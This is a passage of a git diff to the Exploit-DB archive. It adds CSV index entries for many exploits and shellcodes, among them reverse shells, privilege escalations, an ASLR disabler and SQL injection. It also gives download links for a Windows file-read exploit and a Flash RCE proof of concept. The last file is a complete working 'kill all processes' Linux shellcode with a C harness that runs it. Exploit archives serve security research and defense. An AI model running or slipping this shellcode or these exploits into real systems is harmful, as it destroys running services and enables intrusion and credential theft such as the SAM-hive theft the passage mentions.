copies are enabled you can obviously steal the SAM and SYSTEM hive I assume... + +Maybe there's some other use-cases.. but I'm not very smart, so I don't know. + +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46040.rar \ No newline at end of file diff --git a/exploits/windows/local/46051.txt b/exploits/windows/local/46051.txt new file mode 100644 index 000000000..a9a6cc3c1 --- /dev/null +++ b/exploits/windows/local/46051.txt @@ -0,0 +1,2 @@ +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46051.zip +Password: infected \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1635db913..1b0530faa 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6224,6 +6224,8 @@ id,file,description,date,author,type,platform,port 46022,exploits/windows/dos/46022.txt,"VBScript - VbsErase Reference Leak Use-After-Free",2018-12-20,"Google Security Research",dos,windows, 46023,exploits/windows/dos/46023.txt,"VBScript - MSXML Execution Policy Bypass",2018-12-20,"Google Security Research",dos,windows, 46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows, +46038,exploits/linux/dos/46038.py,"Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)",2018-12-24,Sam,dos,linux, +46042,exploits/multiple/dos/46042.html,"Google Chrome 70 - SQLite Magellan Crash (PoC)",2018-12-15,zhuowei,dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10167,6 +10169,9 @@ id,file,description,date,author,type,platform,port 46021,exploits/windows/local/46021.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)",2018-12-20,bzyo,local,windows, 46025,exploits/windows/local/46025.py,"AnyBurn 4.3 - Local Buffer Overflow (SEH)",2018-12-21,"Matteo Malvica",local,windows, 46028,exploits/windows/local/46028.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Read",2018-12-21,evil_polar_bear,local,windows, +46040,exploits/windows/local/46040.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read",2018-12-20,SandboxEscaper,local,windows, +46044,exploits/linux/local/46044.md,"Keybase keybase-redirector - '$PATH' Local Privilege Escalation",2018-10-22,mirchr,local,linux, +46051,exploits/windows/local/46051.txt,"Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)",2018-12-24,smgorelik,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17029,6 +17034,9 @@ id,file,description,date,author,type,platform,port 45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80 46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672 46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple, +46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple, +46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, +46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40524,3 +40532,8 @@ id,file,description,date,author,type,platform,port 46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80 46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443 46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php, +46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php, +46036,exploits/php/webapps/46036.txt,"WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)",2018-12-24,linfeng,webapps,php, +46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php, +46041,exploits/php/webapps/46041.py,"phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read",2018-12-15,VulnSpy,webapps,php, +46050,exploits/php/webapps/46050.txt,"PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)",2018-11-30,"Alex Leahu",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 912b07553..4142865d7 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -927,3 +927,4 @@ id,file,description,date,author,type,platform 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64 +46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux diff --git a/shellcodes/linux/46039.c b/shellcodes/linux/46039.c new file mode 100644 index 000000000..0fa9f9702 --- /dev/null +++ b/shellcodes/linux/46039.c @@ -0,0 +1,42 @@ +# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes) +# Google Dork: None +# Date: 2018-12-08 +# Exploit Author: strider +# Vendor Homepage: None +# Software Link: None +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 14 +# Description: Linux/x86 kill 9 -1 (14 bytes) +------------------------------[Description]--------------------------------- + +This shellcode will kill all processes + +-----------------------------[Shellcode Dump]--------------------------------- + +08048060 <_start>: + 8048060: 31 c0 xor %eax,%eax + 8048062: 50 push %eax + 8048063: b0 25 mov $0x25,%al + 8048065: bb ff ff ff ff mov $0xffffffff,%ebx + 804806a: b1 09 mov $0x9,%cl + 804806c: cd 80 int $0x80 + + -----------------------------[Compile]--------------------------------------------- + gcc -m32 -fno-stack-protector -z execstack -o tester tester.c + + -----------------------------[C-Code]----------------------------- + + #include + #include + + unsigned char code[] = "\x31\xc0\x50\xb0\x25\xbb\xff\xff\xff\xff\xb1\x09\xcd\x80"; + main() + { + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + } \ No newline at end of file